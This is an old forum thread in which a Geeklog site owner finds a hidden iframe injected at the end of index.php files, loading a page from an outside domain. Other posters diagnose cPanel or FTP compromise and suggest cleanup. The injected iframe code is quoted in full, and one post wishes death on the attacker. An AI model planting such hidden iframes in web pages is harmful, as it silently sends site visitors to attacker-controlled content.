Posted on: 03/29/07 01:39pm
By: sirandre007
Not sure how this happened, and caught it by chance.
I was loading my site and on I.E. 6 on the lower left side it usually says stuff so fast you can't read it, like the site it is opening.
Well it was running "slow" and I noticed opening site www.911traff.org.....
I'm like, what the heck is that site? Well after a quick look at in index.php file I found pasted on the end
<IFRAME name='StatPage' src='http://www.911traff.org/trf/traf.php'
width=5 height=5 style='display:none'></IFRAME>
Registered to some piece of crap in Russia! Hope he dies from radiation poisoning from Chernobyl!
He would have to have access to my cpanel or ftp user right?
Re: My site was hacked
Posted on: 03/29/07 02:18pm
By: Dirk
Which Geeklog version was that? Are you running any other scripts on the same server?
bye, Dirk
Re: My site was hacked
Posted on: 03/29/07 03:29pm
By: sirandre007
ver 1.4.1
I installed mychat on it
the site is www.bathmiblog.com.
I went through most the code and found it in the forum index.php also.
Re: My site was hacked
Posted on: 03/29/07 03:36pm
By: Dirk
Reminds me of
this incident[*1] . In that case, it was actually an entire server that had been hacked and several Geeklog sites on that server had been modified ...
bye, Dirk
Re: My site was hacked
Posted on: 03/29/07 07:28pm
By: Anonymous (farangpainai)
Happened to me also, all my websites on our server where infected.
It seems that it is a sort of script that a hacker runs in Cpanel, and all index.htm, index.html, index.php....etc had code added at the end of the file.
This has little to do with Geeklog, to fix this open index.php and all index.html and remove the iframe code. Upgrade to the latest Cpanel version, if you host with a hosting company, inform the hosting company that they have a problem.
Because all index.... files on all domains on that server are probably effected...
Re: My site was hacked
Posted on: 10/19/07 09:46am
By: Anonymous (ashleigh)
Hey Dudes,
I have seen this happen also. The hackers use the FTP account to access these index file. So make sure u don't have a crappy Password for your FTP. Better to Use a combination of caps and numbers with atleast 8 chars. As i have see they only get access to a particular FTP account but not the whole server or other users on the server. My servers uses Hsphere Control panel.
Ashleigh